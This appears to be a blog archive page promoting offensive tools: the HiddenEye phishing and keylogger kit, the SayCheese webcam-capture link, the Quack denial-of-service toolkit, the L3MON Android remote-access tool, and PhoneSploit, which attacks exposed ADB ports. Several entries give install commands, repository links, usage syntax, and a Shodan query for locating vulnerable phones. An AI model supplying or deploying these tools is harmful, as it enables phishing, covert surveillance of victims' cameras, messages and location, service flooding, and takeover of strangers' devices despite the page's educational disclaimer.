Posts

Showing posts from July, 2020

HIDDEN EYE

Image
Get paid to share your links! style="background-color: initial; box-sizing: border-box; color: #0366d6; text-decoration-line: none;" target="_blank"> Modern Phishing Tool With Advanced Functionality PHISHING | KEYLOGGER | INFORMATION_COLLECTOR | ALL_IN_ONE_TOOL | SOCIALENGINEERING         DISCLAIMER TO BE USED FOR EDUCATIONAL PURPOSES ONLY The use of the HiddenEye & its resources/phishing-pages is  COMPLETE RESPONSIBILITY of the END-USER . Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Also we inform you that some of your your actions may be  ILLEGAL  and you  CAN NOT  use this software to test person or company without  WRITTEN PERMISSION  from them. AVAILABLE TUNNELLING OPTIONS** LOCALHOST LOCALXPOSE ( https://localxpose.io ) SERVEO ( https://serveo.net/ ) NGROK ( https://ngrok.com/ ) LOCALTUNNEL (Package Version) ( https://localtunnel.me ) OPENPORT ( https://openpor...

Saycheese tool

Image
SayCheese v1.0 LINK HERE - https://github.com/Anonymous3-SIT/saycheese.git Take webcam shots from target just sending a malicious link How it works? The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia. The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types. See more about MediaDEvices.getUserMedia() here To convince the target to grant permissions to access the cam, the page uses a javascript code made by https:/...

Quack Toolkit

Image
Quack Toolkit           About Quack Toolkit Quack Toolkit is a set of tools to provide denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools. Getting started Quack installation cd quack chmod +x install.sh ./install.sh Quack uninstallation cd quack chmod +x uninstall.sh ./uninstall.sh Quack Toolkit execution To run Quack Toolkit you should execute the following command. quack usage: quack [-h] [--target <ip:port/URL/phone>] [--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]] [--timeout <timeout>] [--threads <threads>] [-u] [--version] optional arguments: -h, --help show this help message and exit --target <ip:port/URL/phone> Target IP and port, URL or phone. --tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT] Attack tool. --timeout <timeout> Timeout in ...

L3MON

Image
Features GPS Logging Microphone Recording View Contacts SMS Logs Send SMS Call Logs View Installed Apps View Stub Permissions Live Clipboard Logging Live Notification Logging View WiFi Networks (logs previously seen) File Explorer & Downloader Command Queuing Built In APK Builder Prerequisites Java Runtime Environment 8 See installation for OS specifics NodeJs A Server Installation Install JRE 8 (We cannot stress this enough USE java 1.8.0 ANY issues that dont use this will be closed WITHOUT a response) Debian, Ubuntu, Etc sudo apt-get install openjdk-8-jre Fedora, Oracle, Red Hat, etc su -c "yum install java-1.8.0-openjdk" Windows click HERE for downloads Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this) install PM2 npm install pm2 -g Download and Extract the latest release from HERE In the extracted folder, run these commands npm install <- install dependencies pm2 start index.js <...

How to install Phonesploit

Image
PHONESPLOIT Recent News (New Update v.1.2) Port Forwarding NetStat Grab wpa_supplicant Turn WiFi On/Off Show Mac/Inet Remove Password Extract apk from app Use Keycode Get Battery Status Get Current Activity PhoneSploit Using open Adb ports we can exploit a device you can find open ports here  https://www.shodan.io/search?query=android+debug+bridge+product%3A”Android+Debug+Bridge” To find out how to access a local device -->  https://www.youtube.com/watch?v=OlhCAX1qBQo HOW TO INSTALL WINDOWS git clone https://github.com/Zucccs/PhoneSploit extract adb.rar to the phonesploit directory cd PhoneSploit pip install colorama python2 main.py HOW TO INSTALL Linux sudo apt update sudo apt install android-tools-adb android-tools-fastboot git clone https://github.com/Zucccs/PhoneSploit cd PhoneSploit pip install colorama python2 main_linux.py HOW TO INSTALL IN TERMUX $ apt-get update -y $ apt-get upgrade -y $ pkg install python -y $ pkg install python2 -y $ pkg install git -y $ git clo...